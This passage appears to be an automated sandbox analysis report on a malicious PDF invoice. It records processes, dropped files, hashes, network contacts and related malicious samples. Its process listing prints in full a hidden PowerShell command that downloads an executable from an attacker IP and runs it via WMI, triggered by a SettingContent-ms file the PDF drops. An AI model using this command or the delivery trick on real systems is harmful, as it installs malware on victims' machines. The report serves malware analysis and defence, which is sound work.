Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.ServiceProcess\2.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.DirectoryServices\2.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Configuration\2.0.0.0__b03f5f7f11d50a3a\System.configuration.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Queries the cryptographic machine GUIDShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Modifies the internet feature controls of the internet explorerShow sources
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exeRegistry value created: HKEY_USERS\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATIONJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 618812 Sample: inovoice-019338.pdf Startdate: 26/07/2018 Architecture: WINDOWS Score: 84 33 Antivirus detection for submitted file 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 PDF contains an OpenAction to launch a SettingContent-ms file 2->37 39 3 other signatures 2->39 8 AcroRd32.exe 8 41 2->8         started        12 AcroRd32.exe 16 2->12         started        process3 dnsIp4 31 files-weighted.r53.acrobat.com 35.168.158.221, 443, 49188 AMAZON-AES-AmazoncomIncUS United States 8->31 45 Document exploit detected (creates forbidden files) 8->45 47 Document exploit detected (process start blacklist hit) 8->47 14 scmwrap.exe 1 8->14         started        16 AcroRd32.exe 98 8->16         started        19 AcroRd32.exe 18 12->19         started        signatures5 process6 file7 21 cmd.exe 14->21         started        27 C:\Users\user\...\downl.SettingContent-ms, XML 16->27 dropped process8 dnsIp9 29 169.239.129.117 ZAPPIE-HOST-ASZappieHostGB Seychelles 21->29 41 Suspicious powershell command line found 21->41 43 Tries to download and execute files (via powershell) 21->43 25 powershell.exe 21->25         started        signatures10 process11

Simulations

Behavior and APIs

TimeTypeDescription
11:20:23API Interceptor6x Sleep call for process: AcroRd32.exe modified
11:21:04API Interceptor6x Sleep call for process: scmwrap.exe modified
11:21:07API Interceptor1x Sleep call for process: powershell.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
inovoice-019338.pdf54%virustotalBrowse
inovoice-019338.pdf0%metadefenderBrowse
inovoice-019338.pdf100%AviraHTML/ExpKit.Gen

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
files-weighted.r53.acrobat.com0%virustotalBrowse

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
files-weighted.r53.acrobat.comReviewDocument.pdf56b415919db85bd10ed2f717664c1d670b85cdd8528b652ff7a7445cc25f139fmaliciousBrowse
  • 54.88.132.98
6rCb6VW7i.pdfadab915a279c24a6510a26309db68624456c3eee9c782d98b825e53bacd37476maliciousBrowse
  • 34.227.146.55

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
ZAPPIE-HOST-ASZappieHostGB37pay.exe253a092b10674a36f89badb5e1dec7960a5db6d806267e13e93b0e4fbc306b60maliciousBrowse
  • 103.208.86.236
#U421#U43f#U438#U441#U43e#U43a #U434#U43e#U43a#U443#U43c#U435#U43d#U442#U43e#U432.jsddfb9241319d9ba433e4bdc8279f796f36c57eb59295da2fdc3aec50ace64656maliciousBrowse
  • 103.208.86.202
12 #U430#U43f#U440 2018.jsdc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532camaliciousBrowse
  • 103.208.86.123
19.04.18.js9d45c3cf3b7ac4e4ac1529859a3ce12dd92f958dc0039133e8d0d3ece3076bacmaliciousBrowse
  • 103.208.86.123
.js9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557maliciousBrowse
  • 103.208.86.215
612018_Scan.js7dc60ff63a4ff9384d0fefebe804f2a90491e1a7815ab7aac85b4b33b55cdfa2maliciousBrowse
  • 185.99.133.156
612018_Scan.js7dc60ff63a4ff9384d0fefebe804f2a90491e1a7815ab7aac85b4b33b55cdfa2maliciousBrowse
  • 185.99.133.156
wsus.exeba8ed406005064fdffc3e00a233ae1e1fb315ffdc70996f6f983127a7f484e99maliciousBrowse
  • 103.208.86.140
Troya.exe3fc12d9abfdb1bb7637cab048b1bbd124043740ae2f6ec72a35c153927492049maliciousBrowse
  • 103.208.86.215
30052018#U043d#U043e#U0432#U044b#U04392.js974e0d6ff10b003f5f313f9f37c390136bebace6cbcaf2e93dfd47e9a2aee924maliciousBrowse
  • 185.99.133.156
PDF_38995.iqy727ce79b953cdc1316fbb66decf8e3463dd0c59ac600b3fba77d1cefc35d9871maliciousBrowse
  • 169.239.129.23
30lov.exeae91546fd21b8e20cc4b3ebb415ed76a106b077d6f27f9b069687170ff43b8f6maliciousBrowse
  • 103.208.86.236
29lobb.exee206b2f2da4442741c0578d25a9b157cde54e205c624cac37eb2b7c185997a3fmaliciousBrowse
  • 103.208.86.236
#U417#U430#U44f#U432#U43a#U430.js6e721da8a41f9d41e05e6749b4b2fcca9cca27c98516cf9ae7d88ae445d3b2e8maliciousBrowse
  • 103.208.86.202
PAGEANT.EXE1fd3b22b3f2d4234ed33a0f6205ddbbc4e54d295017ee478b8a73a9051bd277bmaliciousBrowse
  • 103.208.86.123
19.04.18.js9d45c3cf3b7ac4e4ac1529859a3ce12dd92f958dc0039133e8d0d3ece3076bacmaliciousBrowse
  • 103.208.86.123
612018_Scan.js7dc60ff63a4ff9384d0fefebe804f2a90491e1a7815ab7aac85b4b33b55cdfa2maliciousBrowse
  • 185.99.133.156
PDF_38995 (1).iqy727ce79b953cdc1316fbb66decf8e3463dd0c59ac600b3fba77d1cefc35d9871maliciousBrowse
  • 169.239.129.23
PDFFILE_5362837379_13072018.iqy15c074ab2c3c57e199a9a123bd41a17eca61e5c475f161ee2cc8242d41649bf1maliciousBrowse
  • 169.239.129.17
DOC_198685485_13072018.iqy15c074ab2c3c57e199a9a123bd41a17eca61e5c475f161ee2cc8242d41649bf1maliciousBrowse
  • 169.239.129.17
AMAZON-AES-AmazoncomIncUShttp://livenrich.us/vs.php?rsd=kyle.howson@albertahealthservices.ca maliciousBrowse
  • 34.227.195.185
download.cnet.com//g00/2_d3d3LmJvc3Rvbi5jb20%3D_/TU9SRVBIRVVTOCRodHRwOi8vY3AtaW4ubmFub3Zpc29yLmlvL2NsaWVudHByb2ZpbGVyL2FkYj9pMTBjLm1hcmsuc2NyaXB0LnR5cGU%3D_$/$/$maliciousBrowse
  • 52.201.45.50
19Scan_012394 inquiry december .pdf.exe3254a69a6925a970edce2644e01170270f189e194f0fd11269f8f82396629c7amaliciousBrowse
  • 52.71.185.125
Sonic_Academy_-_KICK_2_v304_macOS_R2R.app.zip1d3d80fde7efc252a0858e82b5aa0f80e1b8656330a5669827edec5353b8f7c3maliciousBrowse
  • 34.225.153.59
http://elmparkfarms.com/?A0t8v6c80ib8=study@home.commaliciousBrowse
  • 174.129.241.106
tracking_info_125533.doc45ce33d3461844999b883db1b54a51a37ac85115f17aea24906be23362562235maliciousBrowse
  • 184.73.220.206
23yjdyAES7Tg.exe516bc6027af852b6d2283888b2f73cdb2b1dc6a100d7324b246ef2d21f5b7515maliciousBrowse
  • 52.86.22.136
Feedback1492612493425.apk2a36acf075bafa30f87ece74b972bd184443f5dab0fd3b26bca31be270f0d816maliciousBrowse
  • 34.232.225.240
NALC-salaries.xlsa8e51422afb18777d892ce0fceb15bc08df6f6e265b66b5ccab8021e53fafb97maliciousBrowse
  • 52.1.52.89
13Swift Advise PDF.exe102e40cf5f3ef11ccc33e636ff3cbff95d753cd6bee3015e24e8d673d86051a1maliciousBrowse
  • 34.232.43.118
23system@noemai.exe5802c38dffd1caea47ab2b0ad91fa94bcdc0e5c10d5e9a2bfeed5b04d63f92e8maliciousBrowse
  • 54.82.28.248
http://aperhu.com/ser0712.pngmaliciousBrowse
  • 54.225.165.138
abaytana.doc668f223d7a425a2aeeea1d1c40fb3e0bb25667e4a2794b6f3b15b7d053e7f203maliciousBrowse
  • 34.197.179.172
http://yobit.com/maliciousBrowse
  • 34.204.127.79
MetroFax_20171204_1511903972_175.jse6becda297b20c8395ea8cd1cc175080c4fe67b9041847f8f980d8c06da3fafdmaliciousBrowse
  • 54.221.226.80
PRMCH Global Updates_v0.1_apkpure.com.apk9d441742d07b4689c5a95b75a44c5b52e848b6aaaada631e79681d78475ccd56maliciousBrowse
  • 107.20.173.57
fax_322311.doc075a45a6dce497ef689c3211ebc3e84f9de6fd1027ec80c7653cc60fcc1d3275maliciousBrowse
  • 184.73.220.206
ATT61705.docc8d2b1b8ede8f5c219030094aaf72e9c027a630abcdc90f3576867879999d1bbmaliciousBrowse
  • 52.22.172.19
2017-12-18-Hancitor-maldoc-invoice_282079.doc373da1b6a95ba6e9d6efe7b57d5877d914ffa394ed6e74576f4283a9388d3c79maliciousBrowse
  • 174.129.241.106
http://fax24.theworkpc.com/sect/7viudnnukv5a0459f0a014c/5a3a8dfaf0363/bWFjYWx1c29mQHN0aWIuaXJpc25ldC5iZQ==?forced=1&tg=d29yZHdpZGVnYg==&s=ZXlKcGRpSTZJbFZRTVdKeFZ6Rk5SMjFpUlVsV2RIVnJhbmQzYVVFOVBTSXNJblpoYkhWbElqb2lXbXh3UjFZNWNUWkNNVVF6UjAxQmEwdDNUV2xIYkZ3dlRrbGxhRWQ1YlhSdmIyRklURU01VlV0U1Z6TjBXRU5vTUU0NU1tNXBiVWhRTWtSNFUwZzRXbVp4T0RsTmRYYzFVVVExTlRBM1NXVklXREZaYmxSSFVVaFNVSEZLUVRFM1oyTndWREJOU2xSblJuWnZLMHhWY1Zad1JFRkxkblkyTm5vMmJWWnJSakY2U2xwaE0ycDVUV1lyU25keU1VMVpkRllyWmsxVVNtZDNlR1psWEM5VVdVTjNXRUZYY2xBNGFtbGNMMVpyUFNJc0ltMWhZeUk2SWpObU5HVTBPR1UwT0RFeVlqVmxZMk0wWW1FeFpXSmxNV1l3WmpReFlXTXhPVE01WkRJMVlUVmhNek0yTkdWaE1HSTNaVGd4T0RBNE1EbGtaak5qWldZaWZRPT0=maliciousBrowse
  • 54.225.121.197

Dropped Files

No context

Screenshots

windows-stand

Startup

  • System is w7_1
  • AcroRd32.exe (PID: 3816 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 MD5: 513659580A49DF6A85CDFD869895924A)
    • AcroRd32.exe (PID: 3860 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3816.0.959207006 --type=renderer --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230 /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a MD5: 513659580A49DF6A85CDFD869895924A)
  • AcroRd32.exe (PID: 3876 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\inovoice-019338.pdf' MD5: 513659580A49DF6A85CDFD869895924A)
    • AcroRd32.exe (PID: 3924 cmdline: 'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' --channel=3876.0.283852601 --type=renderer 'C:\Users\user\Desktop\inovoice-019338.pdf' MD5: 513659580A49DF6A85CDFD869895924A)
    • scmwrap.exe (PID: 2552 cmdline: 'C:\Windows\system32\scmwrap.exe' 'C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms' MD5: 5040C4CA9EE4965AD0BA8DAEE98A1885)
      • cmd.exe (PID: 2068 cmdline: 'C:\Windows\System32\cmd.exe' /C Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null) MD5: AD7B9C14083B52BC532FBA5948342B98)
        • powershell.exe (PID: 2108 cmdline: Powershell -nop -windowstyle hidden -c $a='http://169.239.129.117/cal' $b=\'$env:temp\update12.exe\' $webc = [System.Net.WebClient]::new() $webc.DownloadFile($a, $b) $pclass = [wmiclass]'root\cimv2:Win32_Process' $pclass.Create($b, '.', $null) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\11.0\ReaderMessages
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:SQLite 3.x database
Size (bytes):2048
Entropy (8bit):5.080677532446519
Encrypted:false
MD5:AF124497B84BBAAF0B65652FD2573D50
SHA1:2B991E721C6C48706CE849DD6C4BBA8577D05FF1
SHA-256:3E17BEE0281AFACF559063B5CF2D529A055EFE7838780F6310A1987B0430324A
SHA-512:8A3BE1928E45AD41D7765709EAB7C092C59EA8219D64BB7FB3BBA3B5588199BC7470B43E498E7D8178098733C448B6BFEC8E3AB507E3A815C1CE0D3934D1640A
Malicious:false
Reputation:low
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\11.0\ReaderMessages-journal
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):2588
Entropy (8bit):4.1120126635243475
Encrypted:false
MD5:9925D36B2B5A34A580EB02B0476DAB7D
SHA1:80804732D040F201E68C19A19341B727C4C0D5C4
SHA-256:7EFBBCAC37CC0335FC8CA56FD412066C38286D5343C37DD857989473D9DA0E91
SHA-512:C2D005153D64A5B9514D3CF27CDD587C21390063661129D2861F7052BA8E638E68F783E57FD79B5D7BCD753F08547C7F7D88D619F6A3FE39A388815187311389
Malicious:false
Reputation:low
C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\AdobeFnt14.lst.3924
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:PostScript document text
Size (bytes):512
Entropy (8bit):5.117198274610967
Encrypted:false
MD5:9009986410F80110B25EBB18F9E235A7
SHA1:9CB5D7773B165F6CDA86E919AD55410FA23CA366
SHA-256:90D017508487D81BB94B2B59F8BC7426C378E91FE8A8B7ABD4A96F19F37E1C04
SHA-512:FE16B85E2389E6BFA60C8C39AB322FEBA6E893454153F77999E883B43F558797088C927BFC62BE05781F76F935F163BDDA3BC9992F3C5246FF34507B72682A21
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\Cache\AdobeFnt14.lst.3924
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:PostScript document text
Size (bytes):8244
Entropy (8bit):5.160252507231319
Encrypted:false
MD5:9FBB2D39DC204E0DBDB5C72E4C12A474
SHA1:E5072A7B954D68A136A0699696D4758BF08E6000
SHA-256:6ABE7C5946B7CAC089FDE6F0D6964D9C1B9A973A136599A2B87A72756515E498
SHA-512:2CC7C4972879AD1D470613BF2848F61083551FED9EBB0EE9A58863C78212C60B439DAE25E1EEC261F8F17ED60B34AB9A57C33D2CD7A79166157E70FECE0302D6
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Adobe\Acrobat\11.0\UserCache.bin
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):112386
Entropy (8bit):6.203395176669897
Encrypted:false
MD5:68F1A1D99706F3BEBE482066BE2B164B
SHA1:D2B189828BF90CC5DF11BD4567F4CBE7C279C171
SHA-256:DC8B0568F2D3CA4FBCE620223F0F0D2B7B833D9E107EBFCA84D814912AC1CACB
SHA-512:43E3723C7E3026E2AE8FA48A7B8AE560A2773D96E2733FCBF25A9CE8DC928F88C7DAF31EA96655588733332E5F29138A307EBC20DB2895DE19ACD7ABDFDD0968
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R1e64yi0_96svy3_310.tmp\downl.SettingContent-ms
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:XML document text
Size (bytes):905
Entropy (8bit):5.440423866385781
Encrypted:false
MD5:4B9A44E062F445ACD68B2ED25E02B2D0
SHA1:E5955F64FD55F8B65332D75150120D8E6EFCF53B
SHA-256:7F70C9070A163050E2B7EB8DBE3414340616077561855D9092E2911AF99EEBBD
SHA-512:4EC2B5FD9DD65B56933F4988EEF8CB4A70019127AA36BE52DA62EC2CCCC8A3DE6F3210B1C3DEF718A622A28EA7D795F06E5E0808A6E79ED6E57C8CA12B191D24
Malicious:true
Reputation:low
C:\Users\user\AppData\Local\Temp\acrord32_sbx\FAP7AC9.tmp
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:ASCII text, with no line terminators
Size (bytes):4
Entropy (8bit):1.5
Encrypted:false
MD5:098F6BCD4621D373CADE4E832627B4F6
SHA1:A94A8FE5CCB19BA61C4C0873D391E987982FBBD3
SHA-256:9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08
SHA-512:EE26B0DD4AF7E749AA1A8EE3C10AE9923F618980772E473F8819A5D4940E0DB27AC185F8A0E1D5F84F88BC887FD67B143732C304CC5FA9AD8E6F57F50028A8FF
Malicious:false
Reputation:moderate, very likely benign file
C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdr.dat
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):1561
Entropy (8bit):7.816467242618155
Encrypted:false
MD5:2D21655F74FFEC0B967B89E0FC5459CA
SHA1:2F12542054D62E92D8DC7D97E75F3699DC5AFEFF
SHA-256:3ACBC0BA7AAF3AB2DACC869F316B524E8A29238C5E46FD47AD2748BC832DADB7
SHA-512:E57C848D69DD2A4D4647CA1E216D88AF5C141952AFD6A2177EC0F2BFCBBECF3514416EA112C6D51C2C19B36C71459F1E9BF4653C96C0D2B3A0DD4DA2E3824C6C
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdri.dat
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):4761
Entropy (8bit):7.960179023080062
Encrypted:false
MD5:D46751230F70D9A44DB8DB922A27747A
SHA1:F6004B48A777C6AA49513E5CE352CB2C979C8E85
SHA-256:F46C34FA32B6CC0F7E4FA274A03C1C9C7215A6464A7CC6C988DB3C1EA450CEE7
SHA-512:6EB4CC9045BD621E8E0A135D5072208E2F58F332AAD47144CE611BEF77BA225DC7AF24A463D4A72866668DE354FF67DEC84EA63F1BCDCE96F5293528AB144D25
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Adobe\Acrobat\11.0\Security\services_rdrk.dat
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):264
Entropy (8bit):6.439704084424354
Encrypted:false
MD5:CBCAD2CEDC8D745A6C200B9360677F00
SHA1:B9B61BC123E9A74836E62BC5A1494CDFD9FD09CF
SHA-256:A5A263076F7959F04345FB54D755CF832A1ED0DDA74913B1C6AE0EB40CC10C5F
SHA-512:A9B5D35A527508B86071D05FEA797285CF783752F7938968F8517E7E1346E7D1046A477C8A4BF861F81E85ACDCACDF1972618428FCADAF3B866EE9EB4D95ECCC
Malicious:false
Reputation:low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RCS92RYDG92H2SP9X407.temp
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Size (bytes):8016
Entropy (8bit):3.5527386276805744
Encrypted:false
MD5:D70E49A43E503F40FFC22F06A8C9800E
SHA1:8890C91044705C4DA2F0B273325CFA7B94D335C2
SHA-256:62565743F6808D4B6A97B18A4F17974BB3C429C51040FDD7794C40AA9E186516
SHA-512:71C12CA57413BEF75F2FAAABEACDF8C4A9A108C3B7A9033E9563C00462EEF68AF84DE5B8B0C9FC719B5CEA6C7C16C3D5256085A5EF32C59D55857EC6062D6CBC
Malicious:false
Reputation:low
\AIPC_SRV\broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:data
Size (bytes):1036
Entropy (8bit):0.0
Encrypted:false
MD5:227FD460860A3AD1FD2B245793C07F95
SHA1:71D8DA21D4BB33F4CC32B70B174815E40EDA657E
SHA-256:693195CF289838146418E1BD05FD1A482C36FF75A77874609D615247285D5B99
SHA-512:CE035DBE02B8E15091F7FEE997A823DC4A0EF12C14E4F7D8441B9D3D9878BD17036DB61E24D4E67DB2A6E1F8B50168F6F03311B19713C688691CE4298B1DEB2C
Malicious:false
Reputation:moderate, very likely benign file
\AIPC_SRV\pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a
Process:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
File Type:FoxPro FPT, blocks size 0, next free block index 100663296
Size (bytes):5180
Entropy (8bit):0.028344400812028762
Encrypted:false
MD5:43926F7096372ADEFA37C068D6DB0536
SHA1:98576EEFE021F1B2A3D439CC0DB400BC5F606E54
SHA-256:5D322898C99C585ACFBA501BEACEB2252855C0070A1BE36B534F246231214E01
SHA-512:9F87F60A65E3959E1BE3A1C0DAEA72B99B8371925ABA0D0FC88667F81BED11291B91FBD9735AB46E77C5BF2939F46C65EE14FE66944DA3EB9BEB22351E118A41
Malicious:false
Reputation:low

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
files-weighted.r53.acrobat.com35.168.158.221truefalse0%, virustotal, Browsehigh

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPCountryFlagASNASN NameMalicious
169.239.129.117Seychelles
61138ZAPPIE-HOST-ASZappieHostGBtrue
35.168.158.221United States
14618AMAZON-AES-AmazoncomIncUSfalse

Static File Info

General

File type:PDF document, version 1.4
Entropy (8bit):6.490971090883855
TrID:
  • Adobe Portable Document Format (5005/1) 100.00%
File name:inovoice-019338.pdf
File size:2333
MD5:2f7cec0f91a5fd23d706dc53a82b2db7
SHA1:162e98d89f2ae3b4b469b066ebfe02af22e9b869
SHA256:576a373ccb9b62c3c934abfe1573a87759a2bfe266477155e0e59f336cc28ab4
SHA512:7f4bfbc6c9b2617e56b2dd650d69022c3408c53e50a2bdca1ad4aac1306187d8d09772c36360a09e8f0c7fad9d72deb8e6ba849f9f2db2cc13d1c4ecb5955fb1
File Content Preview:%PDF-1.4.%.....1 0 obj.<</Length 508/Type/EmbeddedFile/Filter/FlateDecode/Params<</ModDate(D:20180712121742+03'00')/Size 905>>>>stream.x.}S.k.0..>.....3...N.&..R{aac....K).|..d.Xj.3..O.ARh.......N.....st.R1)B..c...2e.1.~.X9W.....`.mAk.U...-$%..=.H..B#.#Th

File Icon

Static PDF Info

General

Header:%PDF-1.4
Total Entropy:6.490971
Total Bytes:2333
Stream Entropy:7.630218
Stream Bytes:721
Entropy outside Streams:5.181306
Bytes outside Streams:1612
Number of EOF found:1
Bytes after EOF:

Keywords Statistics

NameCount
obj13
endobj13
stream3
endstream3
xref1
trailer1
startxref1
/Page1
/Encrypt0
/ObjStm0
/URI0
/JS2
/JavaScript3
/AA0
/OpenAction1
/AcroForm0
/JBIG2Decode0
/RichMedia0
/Launch0
/EmbeddedFile1

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 26, 2018 11:22:05.021764994 CEST6363853192.168.1.168.8.8.8
Jul 26, 2018 11:22:05.033562899 CEST53636388.8.8.8192.168.1.16
Jul 26, 2018 11:22:05.129484892 CEST49188443192.168.1.1635.168.158.221
Jul 26, 2018 11:22:05.129544973 CEST4434918835.168.158.221192.168.1.16
Jul 26, 2018 11:22:05.129627943 CEST49188443192.168.1.1635.168.158.221
Jul 26, 2018 11:22:20.311645985 CEST49188443192.168.1.1635.168.158.221

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 26, 2018 11:22:05.021764994 CEST6363853192.168.1.168.8.8.8
Jul 26, 2018 11:22:05.033562899 CEST53636388.8.8.8192.168.1.16

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Jul 26, 2018 11:22:05.033562899 CEST8.8.8.8192.168.1.160x1b5dNo error (0)files-weighted.r53.acrobat.com35.168.158.221A (IP address)IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: AcroRd32.exe PID: 3816 Parent PID: 1480

General

Start time:11:20:23
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:'C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe' /b /id 1480_8670 /if pdfshell_shb8a8b1dd-362e-4b05-997a-36eca3b1115a --shell-broker-channel=broker_pdfshell_sh5e4878b7-68be-4eb6-aa67-522db6d31230
Imagebase:0x1290000
File size:1544928 bytes
MD5 hash:513659580A49DF6A85CDFD869895924A
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Analysis Process: AcroRd32.exe PID: 3860 Parent PID: 3816

General

Start time:11:20:23
Start date:26/07/2018
Path:C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
